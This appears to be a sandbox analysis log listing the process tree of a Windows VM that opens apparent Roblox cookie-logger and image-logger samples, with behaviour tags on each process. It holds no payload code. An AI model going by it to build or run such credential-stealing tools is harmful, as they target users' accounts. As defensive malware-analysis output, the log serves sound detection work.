"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_chrome-extension-roblox-cookie-logger-main.zip\chrome-extension-roblox-cookie-logger-main\extension\scripts\log.js"
1⤵
PID:5636

C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
"C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1384
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\Code /prefetch:4 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\Code\Crashpad --url=appcenter://code?aid=a4e3233c-699c-46ec-b4f4-9c2a77254662&uid=ac291b90-2c6c-42c4-ac69-2024a0880230&iid=ac291b90-2c6c-42c4-ac69-2024a0880230&sid=ac291b90-2c6c-42c4-ac69-2024a0880230 --annotation=_companyName=Microsoft --annotation=_productName=VSCode --annotation=_version=1.98.0 --annotation=plat=Win64 --annotation=prod=Electron --annotation=ver=34.2.0 --initial-client-data=0x480,0x484,0x488,0x47c,0x48c,0x7ff6fdc7b534,0x7ff6fdc7b540,0x7ff6fdc7b550
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:6068
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1708,i,16475458297119970213,3534550678246401993,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1700 /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2096
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=1740,i,16475458297119970213,3534550678246401993,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1904 /prefetch:11
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5624
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --app-user-model-id=Microsoft.VisualStudioCode --app-path="C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app" --enable-sandbox --enable-blink-features=HighlightAPI --disable-blink-features=FontMatchingCTMigration,StandardizedBrowserZoom, --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=3120,i,16475458297119970213,3534550678246401993,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3116 --vscode-window-config=vscode:317e7779-2424-4615-a0c5-8c382ec2d570 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5972
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=3640,i,16475458297119970213,3534550678246401993,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:14
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4080
- - \??\c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\bin\code-tunnel.exe
    "c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\bin\code-tunnel.exe" tunnel status
    3⤵
    - Executes dropped EXE
    PID:1884
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=3668,i,16475458297119970213,3534550678246401993,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3660 /prefetch:14
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3512
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --app-user-model-id=Microsoft.VisualStudioCode --app-path="C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app" --enable-sandbox --enable-blink-features=HighlightAPI --disable-blink-features=FontMatchingCTMigration,StandardizedBrowserZoom, --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3748,i,16475458297119970213,3534550678246401993,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3744 --vscode-window-config=vscode:317e7779-2424-4615-a0c5-8c382ec2d570 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2036
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --dns-result-order=ipv4first --inspect-port=0 --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=3884,i,16475458297119970213,3534550678246401993,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3880 /prefetch:14
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3428
- - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
    "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --max-old-space-size=3072 "c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\tsserver.js" --serverMode partialSemantic --useInferredProjectPerProjectRoot --disableAutomaticTypingAcquisition --cancellationPipeName C:\Users\Admin\AppData\Local\Temp\vscode-typescript\579911c37183187b84f3\tscancellation-4cf07c7bc0bee823da33.tmp* --locale en --noGetErrOnBackgroundUpdate --canUseWatchEvents --validateDefaultNpmLocation --useNodeIpc
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:5656
- - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
    "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --max-old-space-size=3072 "c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\tsserver.js" --useInferredProjectPerProjectRoot --enableTelemetry --cancellationPipeName C:\Users\Admin\AppData\Local\Temp\vscode-typescript\579911c37183187b84f3\tscancellation-ee7c45f08b4c99423e8a.tmp* --locale en --noGetErrOnBackgroundUpdate --canUseWatchEvents --validateDefaultNpmLocation --useNodeIpc
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5960
  - - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
      "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" "c:/Users/Admin/AppData/Local/Programs/Microsoft VS Code/resources/app/extensions/node_modules/typescript/lib/typingsInstaller.js" --globalTypingsCacheLocation C:/Users/Admin/AppData/Local/Microsoft/TypeScript/5.8 --enableTelemetry --typesMapLocation "c:/Users/Admin/AppData/Local/Programs/Microsoft VS Code/resources/app/extensions/node_modules/typescript/lib/typesMap.json" --validateDefaultNpmLocation
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Network Configuration Discovery: Internet Connection Discovery
      PID:3480
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "npm install --ignore-scripts types-registry@latest"
        5⤵
        
        PID:2704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wsl.exe -l -q"
  2⤵
  PID:5144
- C:\Windows\System32\wsl.exe
  C:\Windows\System32\wsl.exe --status
  2⤵
  PID:5848
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=4660,i,16475458297119970213,3534550678246401993,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=4664 /prefetch:10
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:5132
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=5124,i,16475458297119970213,3534550678246401993,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=5128 /prefetch:14
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Temp1_Image-logger-roblox-main.zip\Image-logger-roblox-main\index.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:1444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffde98d3cb8,0x7ffde98d3cc8,0x7ffde98d3cd8
  2⤵
  PID:3260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,13735370034703361202,8055208059999737908,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:2
  2⤵
  PID:3352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,13735370034703361202,8055208059999737908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,13735370034703361202,8055208059999737908,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2584 /prefetch:8
  2⤵
  PID:4360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,13735370034703361202,8055208059999737908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,13735370034703361202,8055208059999737908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:5364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,13735370034703361202,8055208059999737908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
  2⤵
  PID:5124
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,13735370034703361202,8055208059999737908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:8
  2⤵
  PID:5784
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,13735370034703361202,8055208059999737908,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5776

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5916

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3312

C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe
"C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1540

C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
"C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Fake-img-logger-main.zip\Fake-img-logger-main\README.md"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Checks processor information in registry
- Modifies registry class
PID:4160
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Roaming\Code /prefetch:4 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Roaming\Code\Crashpad --url=appcenter://code?aid=a4e3233c-699c-46ec-b4f4-9c2a77254662&uid=ac291b90-2c6c-42c4-ac69-2024a0880230&iid=ac291b90-2c6c-42c4-ac69-2024a0880230&sid=ac291b90-2c6c-42c4-ac69-2024a0880230 --annotation=_companyName=Microsoft --annotation=_productName=VSCode --annotation=_version=1.98.0 --annotation=plat=Win64 --annotation=prod=Electron --annotation=ver=34.2.0 --initial-client-data=0x470,0x474,0x478,0x46c,0x47c,0x7ff6fdc7b534,0x7ff6fdc7b540,0x7ff6fdc7b550
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3736
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1808,i,15733205967221230082,2459924531789789485,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1800 /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2728
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=1972,i,15733205967221230082,2459924531789789485,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1968 /prefetch:11
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4844
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --app-user-model-id=Microsoft.VisualStudioCode --app-path="C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app" --enable-sandbox --enable-blink-features=HighlightAPI --disable-blink-features=FontMatchingCTMigration,StandardizedBrowserZoom, --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=3088,i,15733205967221230082,2459924531789789485,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3084 --vscode-window-config=vscode:6f4172c5-47d2-4edf-a8a0-35ead78934a3 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5540
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --dns-result-order=ipv4first --inspect-port=0 --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=3784,i,15733205967221230082,2459924531789789485,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3788 /prefetch:14
  2⤵
  - Executes dropped EXE
  PID:5236
- - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
    "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" "c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\markdown-language-features\dist\serverWorkerMain" --node-ipc --clientProcessId=5236
    3⤵
    - Executes dropped EXE
    PID:6304
- - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
    "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --max-old-space-size=3072 "c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\tsserver.js" --serverMode partialSemantic --useInferredProjectPerProjectRoot --disableAutomaticTypingAcquisition --cancellationPipeName C:\Users\Admin\AppData\Local\Temp\vscode-typescript\54c008b6b36d94f80d4d\tscancellation-63f453f4a377b91009fd.tmp* --locale en --noGetErrOnBackgroundUpdate --canUseWatchEvents --validateDefaultNpmLocation --useNodeIpc
    3⤵
    - Executes dropped EXE
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:6328
- - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
    "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --max-old-space-size=3072 "c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\tsserver.js" --useInferredProjectPerProjectRoot --enableTelemetry --cancellationPipeName C:\Users\Admin\AppData\Local\Temp\vscode-typescript\54c008b6b36d94f80d4d\tscancellation-76eb136ae0fcde57fbca.tmp* --locale en --noGetErrOnBackgroundUpdate --canUseWatchEvents --validateDefaultNpmLocation --useNodeIpc
    3⤵
    - Executes dropped EXE
    PID:6356
  - - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
      "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" "c:/Users/Admin/AppData/Local/Programs/Microsoft VS Code/resources/app/extensions/node_modules/typescript/lib/typingsInstaller.js" --globalTypingsCacheLocation C:/Users/Admin/AppData/Local/Microsoft/TypeScript/5.8 --enableTelemetry --typesMapLocation "c:/Users/Admin/AppData/Local/Programs/Microsoft VS Code/resources/app/extensions/node_modules/typescript/lib/typesMap.json" --validateDefaultNpmLocation
      4⤵
      Executes dropped EXE
      System Network Configuration Discovery: Internet Connection Discovery
      PID:6540
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "npm install --ignore-scripts types-registry@latest"
        5⤵
        
        PID:6624
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=3656,i,15733205967221230082,2459924531789789485,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2692 /prefetch:14
  2⤵
  - Executes dropped EXE
  PID:956
- - \??\c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\bin\code-tunnel.exe
    "c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\bin\code-tunnel.exe" tunnel status
    3⤵
    - Executes dropped EXE
    PID:4532
- C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
  "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=3876,i,15733205967221230082,2459924531789789485,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3852 /prefetch:14
  2⤵
  - Executes dropped EXE
  PID:4496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wsl.exe -l -q"
  2⤵
  PID:5500
- C:\Windows\System32\wsl.exe
